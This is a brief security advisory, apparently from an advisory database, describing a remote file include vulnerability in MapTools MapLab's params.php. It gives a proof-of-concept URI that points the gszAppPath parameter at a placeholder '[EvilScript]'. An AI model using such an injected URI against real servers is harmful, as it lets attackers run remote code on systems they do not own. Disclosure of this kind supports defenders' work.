|
MapTools MapLab Params.PHP Remote File Include Vulnerability
Attackers can use a browser to exploit this issue. The following proof-of-concept URI is available: http://www.example.com/pathmaplab/htdocs/gmapfactory/params.php?gszAppPath=[EvilScript] |
|
Privacy Statement |